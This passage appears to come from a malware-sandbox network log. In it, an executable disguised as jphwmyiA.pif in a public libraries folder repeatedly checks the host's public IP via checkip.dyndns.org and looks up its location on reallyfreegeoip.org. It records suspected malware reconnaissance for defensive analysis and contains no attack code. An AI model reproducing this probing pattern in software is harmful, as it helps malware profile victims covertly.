                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:24.859649897 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:25.127861023 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          10 | 192.168.2.5 | 53630 | 132.226.8.169 | 80 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:23.520108938 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:24.304143906 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:24.519486904 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          11 | 192.168.2.5 | 53650 | 132.226.8.169 | 80 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:25.818768024 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:26.919437885 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          12 | 192.168.2.5 | 53662 | 132.226.8.169 | 80 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:27.580108881 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:28.345350027 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          13          192.168.2.5  53671        132.226.8.169   80                7820  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:29.069691896 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:29.843044043 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:29 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          14          192.168.2.5  53681        132.226.8.169   80                8016  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:30.174958944 CET  151                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:30.936165094 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:30 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:30.941059113 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:31.189481020 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:31.399454117 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:32.567589998 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:32.820883989 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          15          192.168.2.5  53683        132.226.8.169   80                7820  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:30.441075087 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:31.215025902 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          16          192.168.2.5  53694        132.226.8.169   80                7820  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:31.846843958 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:32.604804039 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          17          192.168.2.5  53709        132.226.8.169   80                7820  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:33.209072113 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:33.990097046 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:33 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          18          192.168.2.5  53711        132.226.8.169   80                8016  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:33.447262049 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:34.212887049 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:34 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          19          192.168.2.5  53723        132.226.8.169   80                7820  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:34.648036003 CET  151                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:35.397993088 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          20          192.168.2.5  53724        132.226.8.169   80                8016  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:34.891937017 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:35.639106989 CET  273                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                          21          192.168.2.5  53738        132.226.8.169   80                8016  C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                                                                          Jan 6, 2025 07:54:36.253647089 CET  127                OUT        GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:37.041984081 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:36 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          22 | 192.168.2.5 | 53750 | 132.226.8.169 | 80 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:37.730009079 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:38.493609905 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:38 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          23 | 192.168.2.5 | 53759 | 132.226.8.169 | 80 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:39.123497963 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:39.896935940 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:39 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          24 | 192.168.2.5 | 53771 | 132.226.8.169 | 80 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:40.676455975 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:41.468208075 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          25 | 192.168.2.5 | 53782 | 132.226.8.169 | 80 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:42.075858116 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:42.849483967 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:42 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          0 | 192.168.2.5 | 49726 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:13 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:13 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:13 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461242
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dmynYXe6JJFBXXyVd%2B0bIAc555EDHrbQs4sN5Eg9J30ifWOFAfhjTeXp2sQKzWGyp%2B2XWAucdnMIPi9jFMr9cVpvVArAL%2BSvhu2Tgoucvl%2FD2DeeH2VVwOFUxyE1X61cvaWlDY2H"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cba6be1741f9-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1773&rtt_var=666&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1646926&cwnd=216&unsent_bytes=0&cid=d88330b70a4594c3&ts=238&x=0"
                                                                                                                                          2025-01-06 06:54:13 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          1 | 192.168.2.5 | 49730 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:14 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:14 UTC | 865 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:14 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461243
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p0ZiXX9DQScieFXQb8%2FMMuXps1Yp7u1HtcRg7slyIdM87MV54vyaoIkTX%2B4xrq3k%2BG0clmNBC%2FvufiU16p6roTpqNTg%2BxnKhOn54%2FJ99%2F2U1lfIvAnn%2FnOzVRpdZ5HI57oFhWkv7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbaccd737d0c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2043&rtt_var=777&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1399808&cwnd=156&unsent_bytes=0&cid=8d6d838247aeaae1&ts=148&x=0"
                                                                                                                                          2025-01-06 06:54:14 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          2 | 192.168.2.5 | 49733 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:15 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:15 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:15 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461245
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWTPUraCzA5Pv4bQ0BGIt5nUQgEB98S21Utvd%2F1qFVOznBte9C6dlBmZEx55tpjSJWSzxn%2BeCbtKouD2wUR4KgMFrwAmDlcZyYrbcFUAvdJRPQ2e7WtiV0qewMylTriPLyrgH%2FEQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbb579d04339-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1571&rtt_var=598&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1815920&cwnd=227&unsent_bytes=0&cid=2f4bf27cba799234&ts=153&x=0"
                                                                                                                                          2025-01-06 06:54:15 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


